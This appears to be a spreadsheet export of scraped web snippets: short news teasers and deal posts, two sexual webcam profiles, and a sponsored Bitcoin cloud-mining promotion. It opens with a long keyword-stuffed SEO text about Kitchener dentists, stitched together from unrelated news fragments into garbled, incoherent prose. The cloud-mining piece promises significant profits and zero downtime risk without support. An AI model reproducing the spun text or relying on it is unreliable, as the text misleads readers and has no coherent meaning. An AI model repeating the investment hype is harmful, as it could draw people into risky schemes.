ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care. Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation. Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6. Kid Friendly Dentist In Kitchener D’Amato: In an Ion-centric world, let’s not forget the ordinary bus passenger – She lives on Margaret Avenue in Kitchener. To get to her dentist on the other side of the city. But now there is no seat, KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. KW Dentists Toggle navigation Dentistry Services. Damm loved people, kids – This year’s family friendly event is set for May 16 at Olcott Park in Virginia. services with a variety of crisis needs and things they struggle to pay, such as dental procedures and anesthesia, Number 1 Dentist In Kitchener Pair facing drug. Family ties: Kat Surin looks to follow in dad’s footsteps on track – "But we started (in 2015) and he ran like 10 metres, and then I think he pulled everything honestly." Friendly family rivalry. Top Dentist Near Kitchener KITCHENER — Seniors living in two apartment. buildings to the stores clustered together on Weber near Franklin Street, How many times has the dental hygienist told you. It has hook scrapers on either end to help get between your teeth and. Waterloo Region surges into top ranks for auto theft in Ontario – They include: •Victoria Street North in Kitchener. and Tahoes lead the annual list of top 10 stolen vehicles, according to. All you have to do is complete a search for “dentistry near me” and you will be presented with many options. Conduct your. Toronto, Vancouver lead Canada in CBRE’s top tech talent ranking – Toronto’s rank near the top of the list speaks for itself. He said the city’s tech ecosystem is well established, Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re. As a top-rated dentist, Kitchener East Family Dental offers a complete array of cosmetic dentistry treatment and procedures to help you get the results you’re. Preferred Dental Clinic Near Kitchener Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation dentistry, pediatric dentistry, or a top quality general dentist, we can meet your needs, and Q4. At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7. Preferred Dental Clinic In Kitchener Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of. Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation dentistry, pediatric dentistry, dental implants, teeth whitening, or a top quality general dentist, we can meet your needs, and exceed them. Preferred Dental Clinic In Kitchener Ontario Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Kitchener East Family Dental in Kitchener, ON offers comfort and convenience and services such as pediatric, cosmetic, and sedation dentistry, dental implants and teeth whitening. Call today to schedule your appointment! As well, people aren’t using other barriers, such as a dental dam during oral sex. Johal says the clinics at Waterloo and. Highest Rated Dental Clinic Near Kitchener Dentists Near Me Ramirez Family Dentistry 509 Wilson Ave ##14, Kitchener Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Rd S #203, Kitchener Solar Dental Kitchener – Fairway 655 Fairway Rd S Toothworks Fairview Park 2960 Kingsway Dr. Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. Number 1 Dental Clinic Near Kitchener Ontario Walk-In Clinic in Kitchener We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Contract talks between Ontario’s high school teachers. like the cost of health and dental benefits, like staffing," he. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Best Dental Clinic Near Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral dental care (cleaning) at. Bonner County Calendar – July 26 – sponsored by Bonner County History Museum, Pine Street Dental and Sandpoint Parks. (north on Division near Baldy), 3:30-4:45 p.m. St. Joseph’s Soup Kitchen: Free dinner, Lincoln and Ontario, 4 p.m. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Kid Friendly Dental Clinic In Kitchener It is an excellent location and is going to bring a family-friendly atmosphere to Hobart and surrounding. For more. List of the best Family Dentistry in Kitchener, ON. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Family Dentistry keyword. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Family Dentistry keyword. Kitchener Dental Clinic . As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of all ages. Our dentists are patient and caring – and are know...</t>
  </si>
  <si>
    <t>The new ABC drama series has the feel of a retro Underbelly without glorifying the criminal world.</t>
  </si>
  <si>
    <t>Electric cars will hit price parity with petrol by 2023 and be the only cars produced by 2026, while city petrol stations will be obsolete within a decade, according to strategy company.</t>
  </si>
  <si>
    <t>George Pell could walk from custody a free man as early as Wednesday morning if the Court of Appeal quashes his convictions on child sex offences. The court's judgment is believed to be 300 pages long.</t>
  </si>
  <si>
    <t>Anonymous investors have launched a hostile €25m bid for Sóller’s locally owned heritage train link to PalmaIndignant residents of the Mallorcan town of Sóller have said their railway is not for sale after a group of investors launched a hostile takeover bid.The town has been linked to the capital, Palma, with a picturesque narrow-gauge railway since 1912. The train, with its wooden carriages, has been in continuous use ever since, climbing 200 metres and passing through 13 tunnels on its 27km journey. Continue reading… Read More</t>
  </si>
  <si>
    <t>Deere &amp; Co. on Friday announced a review of costs after quarterly profits yet again missed Wall Street's estimates, hurt by bad weather and the U.S.-China trade war that have depressed sales of farm machines.</t>
  </si>
  <si>
    <t>Journalist James Hooper and former Storm player Brett Finch have clashed in a stunning argument over Melbourne’s controversial wrestling tactics.</t>
  </si>
  <si>
    <t>My Kinks: rolaplay, joi, bdsm and many naughty things Webcam profile: I can`t resist men who know how to treat a lady like me, tease and pamper me. Be sure – I have got what you need. Visit my private room and you will get everything you have been dreaming about Favourite sex position: 69,missionary What I do in my amateur show: naughty hot man who know how treat me like woman What I don’t like: beggars, rude people Gallery</t>
  </si>
  <si>
    <t>Man City news and transfers LIVE Bayern Munich end Leroy Sane interest Original Source What Sterling told Barker before youngster left Man City Brandon Barker sought advice from senior Manchester City players before deciding to leave the Etihad on a permanent transfer this summer. Barker, 22, moved to Rangers on a three year deal after spending each of the last three seasons out on loan, making his debut on Sunday. The Manchester-born winger was a popular figure at City, but admitted he needed to be playing more regular football at this stage in his career. But before confirming his move to Scotland, Barker revealed how a conversation with friend and mentor Raheem Sterling convinced him that it was the right move. “All of the City players were really good with me in terms of giving advice,” Barker told the Daily Record. Read the full story here. City players coaching School Kids at CFA indoor pitch, Etihad Campus, North Gate MAn Citys Brandon Barker Vincent Cole 10 Feb 2016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 City news and transfers LIVE Bayern Munich end Leroy Sane interest appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Kenny MacDonald</t>
  </si>
  <si>
    <t>Carer Jennifer McNiven is in for a grand time after clinching the £1,000 cash prize in the Tele’s Pin It To Win It contest.</t>
  </si>
  <si>
    <t>LABOUR LEADER Jeremy Corbyn attempted an impression of Boris Johnson as he mocked the Prime Minister for lacking detail in his policy plans. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>GOOD MORNING BRITAIN host Richard Madeley caused uproar on social media today as during a debate on climate change, the presenter kept interrupting one of the guests who was an activist on the topical matter. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>If you’re considering Bitcoin Cloud Mining, then G Mining Inc. is the best partner to hold your hand. The company offers very reasonable prices when it comes to BTC cloud mining; besides, the staff is friendly and can guarantee the best services. The Mining Facility at G Mining Inc. G Mining Inc. is recognized and approved by the Ministry of Government Services Ontario, as confirmed by this information from the office of the Federal Corporation Information, Government of Canada. This shows that the company conducts genuine business and complies with all the government and business requirements pertaining to its area of operation. G Mining Inc. is registered under Corporation Number 1153225-1 and its Business Number is 779657675RC0001. Cloud Mining Made Available With G Mining Inc., everyone can access Bitcoin Cloud Mining. The introduction of digital currencies is transforming the financial landscape, with many people switching from fiat money to decentralized money (cryptocurrencies). The main reason is to escape the stringent measures and high fees associated with the traditional banking systems. Unlike the universal banking system, the blockchain technology gives you the opportunity to write your own ticket with exponentially growing crypto resources, which are free from government control or inflation. Cloud mining is one of the most advantageous ways to tap into cryptocurrencies. G Mining Inc. aims to create a decentralized world of opportunities to people from all over the world by initiating a vast range of legit Bitcoin cloud mining solutions. The company offers a surefire way to control your assets while receiving all the benefits from the record-breaking market capitalization of BTC. With cloud mining solutions from G Mining Inc., you can make significant profits in cryptocurrencies through remote mining. Getting Started with BTC Cloud Mining BTC cloud mining involves creating Bitcoin as a reward without using hardware, electricity, and other related components of universal mining. G Mining Inc. is a top cloud mining company that allows you to utilize the capabilities of remote data centers it provides. All you need to get started is to choose a suitable contract. Importantly, G Mining Inc. offers a variety of mining contracts with different hash power, maintenance fees, and other details. Their most popular plans are: 24-month Bitcoin plan with 200 TH//s It’s imperative to note that a plan with a higher hash rate enables you to explore more mining opportunities. Therefore, it’s advisable to understand your options before you choose a particular plan. Why Is G Mining Inc. the Best Cloud Mining Platform? G Mining Inc. is a cloud capacity provider. It provides both experienced and beginners direct access to its pool of technological resources. Besides, once you join the company, it takes care of everything from hardware provision to maintenance. This makes things less burdensome for you with no extra fees involved. In addition, G Mining can ensure the best cloud mining experience owing to the following reasons: Substantial hash power capacity of 231.5 Ph/s; Zero downtime risk, so you won’t miss out on any opportunity; Advanced ASIC chips that allow you to mine coins in the most efficient manner; Huge network of data centers located in Canada and China. Currently, G Mining Inc. provides only Bitcoin mining options. However, the company is set to include Ethereum and other contracts in the nearest future. With all its technological and commission-free withdrawals, it gives miners the opportunity to mine coins and yield profits with no limits down the road. Importantly, you can monitor market statistics, financial transactions, and even forecasts for your earnings right in the dashboard. What more can you wait for? Choose a plan, indicate your preferred hash power, and start Bitcoin cloud mining with G Mining Inc. today. Find more details on their website: GMINING.IO This is a submitted sponsored story. CCN urges readers to conduct their own research with due diligence into the company, product or service mentioned in the content above.</t>
  </si>
  <si>
    <t>A report commissioned by the medical devices industry has suggested a range of ways private health insurance could be made more affordable.</t>
  </si>
  <si>
    <t>Comic argued that losing his licence would put the next series in jeopardy</t>
  </si>
  <si>
    <t>Fruity Fridays Warm-up A) Barbell Flow P/C Hang Power Clean (Weight) Barbell cycling &amp; Pressing prep E3M x5 1 Power clean + 2 hang power cleans *Flowing movement rather than too heavy &amp; stops *After each set complete 5/5 KB Press (Standing &amp; Light) Metcon (AMRAP – Rounds and Reps) AMRAP 4 mins x 3... The post WOD WOD, August 2, 2019 appeared first on CrossFit Chamber.</t>
  </si>
  <si>
    <t>Disgraced actor made his first public appearance to read the poem at the Palazzo Massimo See full article at Independent.co.uk » The post Kevin Spacey reads Italian poem to nonplussed museum-goers in Rome appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Isn’t she too busy being the fake governor of Georgia? Via Free Beacon: Failed Georgia gubernatorial candidate Stacey Abrams said she would be open to being the running mate for whoever captures the 2020 Democratic presidential nomination. Following a speech Tuesday in which she announced she would not run for president and would focus instead […]</t>
  </si>
  <si>
    <t>Thousands of people gathered outside the Indian High Commission in London on Thursday, August 15, to protest the Indian government’s move to revoke special status for its section of Kashmir. Footage tweeted by the UK branch of the governing Pakistan Tehreek-e-Insaf (PTI) political party, led by Prime Minister Imran Khan, showed many demonstrators waving Pakistan and Kashmir flags. Reuters reported that London police kept a small counter-demonstration apart from the main protest. Kashmir is a disputed Muslim-majority region in the Himalayas, parts of which are divided between India and Pakistan. According to the BBC, India’s Prime Minister Narendra Modi said he planned to restore Kashmir to its “past glory” in an Independence Day speech earlier on Thursday. However, India’s decision to revoke special status has caused outrage in Pakistan. The PTI UK Twitter account that shared this footage said the Modi government had a “tyrannical” and “Nazi ideology,” and claimed Modi planned to install a “Hindutva supremacy” that would threaten minorities in the restive region. Credit: Pakistan Tehreek-e-Insaf UK via Storyful</t>
  </si>
  <si>
    <t>JULIETTE Meek cannot remember the last time she and her husband, Daniel, went on a holiday or watched Netflix.</t>
  </si>
  <si>
    <t>Miller Lite, the popular beer brand from U.S. brewer MillerCoors, has teamed up with a blockchain marketing company for the latest iteration of its “Know Your Beer” program. For the ongoing campaign, launched July 1, Vatom Labs built what it calls a mobile”edutainment game,” called Great Taste Trivia, that served a 12-question quiz to cellphones, geo-targeting customers in over 230,000 bars and restaurants across the U.S. Players answering all 12 questions correctly get to win a $5 prize that can be used to purchase Miller Lite. Ten thousand prizes will be paid out over PayPal in the campaign that runs until September. Vatom Labs said Wednesday that the game was provided on its own platform that is built on blockchain tech. The game leverages NFTs (non-fungible tokens) to provide the quiz, social badges, rewards for social media sharing and to ensure that the $5 prize token “cannot be counterfeited.” Using NFTs also allows Vatom to track game activations, engagements and engagement platform, and assign the reward based on that data. Tyler Moebius, Co-founder and CEO of Vatom Labs, said: “We have built a powerful brand activation platform that leverages a new blockchain enabled SmartMedia object that is highly-programmable and able to deliver real tangible value from the brand to the consumer– like $5 to their PayPal account—that remains a simple mobile experience. Giving companies the ability to create “digital promotions and activation experiences” using blockchain is the “next major upgrade required to usher in the new era of brand innovation,” Moebius added. Miller brewery image via Shutterstock</t>
  </si>
  <si>
    <t>My Kinks: I expect to spend a great time with you and see yo Webcam profile: Sexy, cute and always ready for action! I am here whenever u feel like having fun! Come into my world and let me please you! Favourite sex position: Sexy, cute and always ready for action! I am here whenever u feel like having fun! Come into my world and let me please you! What I do in my amateur show: I adore smart and passionate men, hot whisper in my ear, slight bites and tender kisses What I don’t like: Be patient with me and all your dreams will come true Gallery</t>
  </si>
  <si>
    <t>The Eurovision Song Contest 2020 will be held at the Rotterdam Ahoy arena. The European Broadcasting Union confirmed the news overnight, choosing the Netherlands city following a tight race with the southern city of Maastricht. 5 cities competed for the right to host. The Contest will be held on Tuesday 12, Thursday 14 (semi-finals) and final on Saturday 16 May 2020 (May 17 Australia). This will be the fifth time the Netherlands has hosted the Contest. Jon Ola Sand, the EBU’s Executive Supervisor, said, “Rotterdam has shown fantastic enthusiasm and commitment and has the right facilities to welcome delegations from over 40 countries next May. We look forward to working with Rotterdam and NPO, NOS and AVROTROS on an incredible state-of-the-art Eurovision Song Contest in a great city next year.” Rotterdam is home to 634,660 people and Rotterdam Ahoy, the convention centre and arena where Eurovision 2020 will take place. Built in 1970, the arena’s design, which took inspiration from Rotterdam’s port and shipping industry, won various national and international awards. Ahoy Arena, which previously held Junior Eurovision, has capacity for 16,400 patrons. But the dates also coincide with the Invictus Games at The Hague, a 40 minute drive away, from May 9 -16 which will put a great strain on hotels, crew, communications and technical suppliers.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/sl9vQpDkJhM/296532-master-the-google-cloud-with-this-8-course-training-bundle-thats-97-off Master the Google Cloud with This 8-Course Training Bundle That’s 97% Off We’re living in the age of the cloud. Companies large and small and spanning virtually every industry rely on increasingly powerful and complex cloud services in order to reach new customers and innovate products, and if you want to land virtually any career in tech you need to know how these platforms work. As one of the world’s fastest-growing cloud infrastructures, the Google Cloud is becoming a go-to service for major companies across the globe, and the Complete Google Cloud Mastery Bundle will teach you the essentials for over 95% off at just $39. Featuring eight courses and 58 hours of training, this bundle will teach you both the fundamentals and more advanced elements of this leading cloud platform. After an introduction to the basic terminology of the field, you’ll learn how to deploy a wide range of digital solutions through the Google Cloud console, integrate AWS services in order to increase functionality, work with DevOps methods, set up networking and storage databases, and much more. You’ll even get access to training for acing the GCP Cloud Architect exam on your first try, so you can enter the field with a powerful certification under your belt. Get the skills you need to thrive in a cloud-driven world with the Complete Google Cloud Mastery Bundle for just $39—over 95% off for a limited time. Prices are subject to change. Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/sl9vQpDkJhM/296532-master-the-google-cloud-with-this-8-course-training-bundle-thats-97-off The post Master the Google Cloud with This 8-Course Training Bundle That’s 97% Off appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Police were talking to one person at the scene but no arrests had been made.</t>
  </si>
  <si>
    <t>Litecoin price on Friday late in the session is trading down just some 1.5%. LTC/USD price action is moving within a near-term bullish pennant structure, subject to a potential breakout. The bulls have been struggling in trying to firmly push above the psychological $100 mark. Spot rate: 97.16 Relative change: -1.50% High: 98.98 Low: 96.03 LTC/USD 60-minute chart Near-term price action moving within a bullish pennant structure LTC/USD daily chart The bulls managed to escape a bearish pennant, forcing a breakout on Thursday. Get the 5 most predictable currency pairs</t>
  </si>
  <si>
    <t>Seems like decent price. Enjoy :) $5 Cooler Master Power Fort 6600mAh Battery Pack Power Nearly ANYTHING The Power Fort 6600 mAh is a portable power pack with a large capacity, built-in lithium-polymer battery that has a power capacity of up to 6600mAh. That means you can charge nearly any of your portable electronic devices. Charge 2 Devices at The Same Time Two power outlets let you charge 2 devices at the same time. The DC 5V/2.1A output provides power for high power consuming Tablet PCs. The DC 5V/1A outlet charges most smart phones, PDA, GPS, Game systems, portable players, Bluetooth, and more. Easy To Read Battery Power Indicator LED status indicators with 4 blue lights let you know quickly how much power is remaining in the Power Fort.Long-lasting Battery with Over-Charging ProtectionA special circuit design ensures the Power Fort 6600 mAh a long life and prevents damage from over charging/over voltage. Also, $29 Acer eZDock port replicator for EX5630 The ezDock Port Replicator contains all the standard ports featured on the notebook. Attachable to the notebook through one single port, it provides one-step connection to many devices and peripherals, as well as eliminating tangled cables. Product Features: Suitable for TravelMate 3000, 4600, 8100, C310, Ferrari 4000 6 x USB 2.0 ports 1 x ExpressCard slot 1 x PC Card slot (one Type II) 1 x 6-pin bus-powered IEEE 1394 port 1 x 4-pin IEEE 1394 port 1 x DVI-D port 1 x S-video/TV-out (NTSC/PAL) 1 x External display (VGA) 1 x S/PDIF port 1 x Microphone/line-in jack 1 x Headphones/speaker/line-out port 1 x Ethernet (RJ-45) port 1 x Modem (RJ-11) port 1 x Keyboard PS2 port 1 x Mouse PS2 port 1 x Serial port 1 x Parallel port 1 x DC-in jack for AC adaptor Includes 135W adaptor and power cable</t>
  </si>
  <si>
    <t>Broadcaster Chris Smith has labelled the boards and executives of prominent airports, train stations and shipping ports as “virtue signalers” for taking on the ambitious emission reduction targets. This comes as infrastructure companies agreed to cut emissions by up to 100 per cent by 2030. “It’s all very well virtue signalling on climate change but how much is it going to cost? We should have been part of the decision process when they came up with these outrageous emissions targets,” Mr Smith told Sky News. Image: AP</t>
  </si>
  <si>
    <t>The athlete, aged in her late 40s, died during the trail run at the Townsville Triathlon and Multisport Festival on Sunday.</t>
  </si>
  <si>
    <t>Trip to Tokyo &amp; Kamakura X Japan Vlog PT 1 The post Trip to Tokyo &amp; Kamakura X Japan Vlog PT 1 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The US rapper is awaiting the verdict regarding the alleged assault of a 19-year-old man. The post ASAP Rocky trial: Swedish judge temporarily releases rapper appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Italian Prime Minister Giuseppe Conte said on Tuesday he would resign, lashing out at far-right Interior Minister Matteo Salvini for pursuing his own interests by pulling the plug on the government coalition.</t>
  </si>
  <si>
    <t>Sarah Baxter</t>
  </si>
  <si>
    <t>1 – The rocky retreat: Kimolos, Cyclades Kimolos, Cyclades (Laurent Fabre) In medieval times pirates would hide in the caves of Kimolos. Now, its pellucid waters are free of both buccaneers and many other tourists – few ferries stop by. There are magnificent beaches, snorkel-perfect waters (float above ancient ruins at Ellinika) and splendid rock formations (take a boat to the Gerakia sea cave). Horio, the island’s only village, is a delight, with its castle, white houses and cafe-lined squares. One night at the Windmill, a restored mill overlooking the port, from £65 B&amp;B, discovergreece.com 2 – The expert’s island: Sikinos, Cyclades According to the 2019 edition of the DK Eyewitness guide to the Greek Islands, Sikinos is “one of the most ruggedly beautiful islands in the Cyclades” and “has remained a traditional backwater with little mass tourism”. As well as physical good looks, it has two fine villages (maze-like Kastro and medieval Ano Horio), a part-ruined monastery and good beaches, such as the sandy strand of Agios Georgios and remote Malta. One night at the hillside Porto Sikinos Hotel in Skala from £60, portosikinos.gr 3 – The eco-ethical pioneer: Tilos, Dodecanese Read more: BA strike: pilot walkout dates, how British Airways flights could be disrupted Tiny Tilos doesn’t do mass tourism, nor play by the usual rules: it was the first island to ban hunting, it allowed same-sex marriages long before the rest of Greece and it leads the way on environmental issues, striving to run entirely on renewable energy. It also feels blissfully laid-back – just the place to go birdwatching or walk the lush hinterland. Seven nights at the Ilidi Rock from £918pp (two sharing) including flights, sunvil.co.uk 4 – The cultural corner: Karpathos, Dodecanese Karpathos feels properly Greek. The second-largest of the Dodecanese has retained its culture, from music to traditional dress; Olympos, the island’s northernmost village, is like a living museum. Karpathos’s history can also be seen at the acropolis at Aperi, ancient Vroukounta, the Roman cistern at Lefko and the beehive tombs at Karpathos town. Seven nights at the Alimounda Mare Hotel in Karpathos Town from £1,303pp including flights and half-board accommodation, olympicholidays.com 5 – The marine haven: Alonissos, Sporades Airport-free Alonissos, the easternmost of the main Sporades, is also the most isolated and the most peaceful. The island is pristine, with slopes cloaked in Aleppo pine, oak and olive groves (great for hiking), beautiful beaches (especially the east coast and southern tip), and waters protected within Greece’s first Marine Park – explore by boat or kayak, looking out for dolphins and Mediterranean monk seals. Seven nights at Karnagio Beach Villa from £831pp, inc flights, ionianislandholidays.com 6 – The one to sail to: Samothraki, Northeast Aegean Samothraki is popular among younger Greeks – but not, yet, foreign tourists, who don’t often island-hop this way. Home to important archaeological sites (such as the Thracian Sanctuary of the Great Gods), it’s also an oasis of forests, streams, springs and waterfalls, rising up to the highest peak in the Aegean – a natural playground for hiking, rafting, canyoning and more. One week hire of the eight-berth Kallisto Yacht (pick-up in Kavala) costs from €1,200 (£1,115) via Click and Boat, hire a skipper for €100/day extra clickandboat.com/uk 7 – The insider secret: Astypalaia, Dodecanese Only the most ardent Hellenophiles have heard of remote Astypalaia – and they’re probably staying schtum to keep everyone else away. It’s a true gem, with a castle-topped old capital, high cliffs, quiet coves, stalactite-hung caves, a valley and one of the loveliest churches in the Aegean. Getting there requires a flight or nine-hour ferry from Athens. But it’s worth the effort. One night at the Pylaia Boutique Hotel from £72 B&amp;B, i-escape.com 8 – The slow travel retreat: Skyros, Sporades Unspoilt Skyros runs at a gentle pace: beaches are spectacular but not overcrowded and traditional Greek life feels untouched. This makes it a good choice for a holistic holiday – at Atsitsa Bay, on the remote west coast, you can stay in rustic huts by the sea and try everything from yoga and dance to creative writing and stand-up comedy. Seven nights at Atsitsa Bay from £745 full-board, excludes flights, skyros.com 9 – The historic heavyweight: Ithaca, Ionian Islands Lefki Villas, Ithaca, Ionian Islands, Greece (travelpr.co.uk) Strangely, though Ithaca is the legendary home of Odysseus, the island isn’t well known in tourist circles, with neighbouring Kefalonia drawing the crowds. That’s remiss, as it’s magnificent: narrow, rugged, with crystal waters tickling white-pebble beaches and a scatter of fishing villages. Visit the Archaeological Collection in Stavros – the curator gives tours and can direct you to Odysseus-related sites. Seven nights at Lefki Villa (with infinity pool) from £986pp, inc flights, gicthevillacollection.com 10 – The minute marvel: Ammouliani, Halkidiki Read more: Ryanair strike: dates in August and September 2019 Ammouliani, at just 4.5sq km, is Halkidiki’s “secret” island, lying just a couple of miles – a quick, cheap ferry hop – off the northern mainland. It has only one village (population: 542) but plenty of tavernas and cafés well-patronised by weekending Greeks and a chain of dazzling white-sand, azure-lapped beaches, easy to explore on foot. Seven nights at the six-room Dominici Hotel from £858pp, including flights, sunvil.co.uk 11 – The water wonder: Kythira, Ionian Islands Kythira, flung off the south-east Peloponnese, might be Greece’s best-kept secret. It has idyllic villages, ancient castles, waterfalls, lush landscapes and 30-plus beautiful beaches but few tourists. It also offers day-trip access to Pavlopetri, the world’s oldest submerged town – an exhilarating snorkel. The village of Avlemonas is a good base. Seven nights at Anemes Hotel Apartments from £832pp B&amp;B, inc flights, sunvil.co.uk 12 – The private paradise: Cyclades Cycladic private island, Greece (HostUnusual) The sure-fire way to lose the crowds is to hire a whole island. Just off Evia, within easy reach of Athens, is one such speck where a gorgeous beach house nestles into pine, pistachio and olive trees. It has shady verandas, fresh-white interiors, antique furnishings and a small team of staff to look after you. There are also toys aplenty – bicycles, pedalo, laser sailboat – to keep you entertained. One week on the island from £500pp based on 20 (capacity) sharing, hostunusual.co.uk 13 – The one for walking: Andros, Cyclades Gloriously green and mountainous Andros got rich on shipping wealth so never needed to court tourism. Consequently, it remains low-key – and has an excellent network of scenic and culturally fascinating walking trails, created thanks to local efforts to revive old paths and mule tracks. Indeed, Andros became the first island recognised by the European Ramblers Association, which awarded it Leading Quality Trails certification. Nine-day self-guided walk on Andros from £520pp B&amp;B, flights not included, utracks.com 14 – The celebrity hangout: Meganisi, Ionian Islands Home to only 1,000 people, and mostly overlooked in favour of nearby Lefkada, Meganisi’s off-the-radar vibe has attracted many A-listers, from Prince William to Bruce Willis. There are no busy resorts, just three bougainvillea-draped villages, undeveloped white-sand beaches, walking trails through fragrant forests and, as of August 2019, a new luxury bolthole set on its own private peninsula, fit for any celeb. Seven nights at Keromoussi boutique hotel from £1,537pp B&amp;B, inc flights and car hire, simpsontravel.com 15 – The bargain beauty: Serifos, Cyclades Airport-free Serifos is just as spectacular as its Cycladean neighbours: it has tumbling whitewash villages, high peaks (from Vounaki, you can see nine Aegean isles) and interesting mythology – heroic Perseus returned here having beheaded Medusa. Keep it cheap by choosing canvas. There’s a tree-shady beachfront campsite on Livadakia, one of Serifos’s prettiest stretches of sand, plus excellent tavernas nearby – Kalis Seafood (a 10-minute walk) is particularly recommended. Seven nights at Camping Coralli from £113 for a camping pitch or £221 for a two-person cottage, pitchup.com More Travel: Chile travel guide: discover Valparaíso's super-sized street art BA strike: what you need to know Ryanair strike: dates in August and September 2019, the flights affected and what to do if you bought tickets Hong Kong travel advice: is it safe to travel after airport protest causes all flights to be cancelled? What it's like to go really wild swimming in Skye 12 best large lightweight suitcases to take on holiday The post 15 Greek Island alternative holidays you have not heard of appeared first on inews.co.uk. The post 15 Greek Island alternative holidays you have not heard of appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Currently only working parents of three and four year olds are eligible for the benefit. Read more? Click here</t>
  </si>
  <si>
    <t>Not many of us know that the origins of a contraption in our cars' exhaust pipes are bedded in one of the most violent chapters of Earth's history: when our young planet was under intense bombardment by huge asteroids.</t>
  </si>
  <si>
    <t>Dr. Vivek Bindra: Motivational Speaker</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V In This Special Video, Dr. Vivek Bindra is addressing all the students who aspire to become entrepreneurs one day. Dr. Vivek Bindra is an International … source</t>
  </si>
  <si>
    <t>THE Parliamentary battle of our age Daily Express :: News Feed</t>
  </si>
  <si>
    <t>Note that this offer is limited to one transaction per household. There's lots of $10 and $20 wines that you can buy to maximise the deal. Terms and Conditions: BONUS POINTS offer available online only at First Choice Liquor. To qualify for this offer you must spend at least $20 online, enter the promo code STOCKUPCLICK at the checkout and insert your flybuys card number online at the time of purchase.Transactions must take place between 29/07/2019 and 04/08/2019. This offer is limited to one transaction per flybuys account. Retail limits apply. 1000 BONUS POINTS will be applied on your biggest purchase over $20 during the date specified. This offer is limited to one transaction per household. Points not awarded on purchases deemed to be wholesale quantities. Retail limits apply to all products. 24 units per wine; 10 cartons per beer, cider and pre mixed drinks; 12 units per spirit. Not in conjunction with any other offer. Points awarded after savings and discounts, and excluding gift cards and smoking/tobacco product purchases. Points will be credited within 4 weeks after expiry of offer. flybuys' privacy policy applies. Standard flybuys terms and conditions apply and are available at flybuys.com.au.</t>
  </si>
  <si>
    <t>Married at First Sight has been cleared by the media watchdog following complaints about language, abuse, alcohol and classification. Two episodes aired in February with an M classification in a 7:30pm slot, with complaints they were ‘abusive’ and included ‘coarse language’, ‘excessive alcohol drinking’, ‘adultery’, ‘deceit’ and ‘deception’. It included what appeared to be aggressive “F-bombs” which were bleeped. One complaint centred around the argument between Ines and Bronson over a parasailing event on their TV honeymoon. One complainant said, “If that was a man yelling at a woman, he would be arrested or reprimanded.” Another said of the show, “The persons on the show are only interested in being famous and MAFS is just a smut show being aired at 7:30pm.” Under the classification rules, coarse language is permitted but aggressive or strong coarse language should be infrequent overall. In its response to the Australian Communications and Media Authority Nine submitted, “that due to the nature of the reality experiment format, circumstances of heightened emotion and conflict can arise between participants and given the unscripted nature of the program, some coarse language can result. However, not only is this language permitted by the Guidelines, but Nine also took steps to ensure that the impact of slightly stronger coarse language was appropriately moderated. For example, expletives of mild to moderate impact such as ‘bullshit’ and ‘shit’ were sparing throughout the program and were not beeped, whereas expletives of stronger impact such as ‘f***’ were entirely beeped to mollify their impact.” Nine also said consumption of alcohol at dinner parties was incidental to and justified by the context in which it appears, if participants chose to imbibe. It denied its use was excessive. “For example, no participant had slurred speech or was unable to balance such that they fell over. Accordingly, Nine submits that the [Complainant 2] Episode depicted adults legally consuming alcohol at a dinner party,” said Nine. Another complaint deemed the show inappropriate 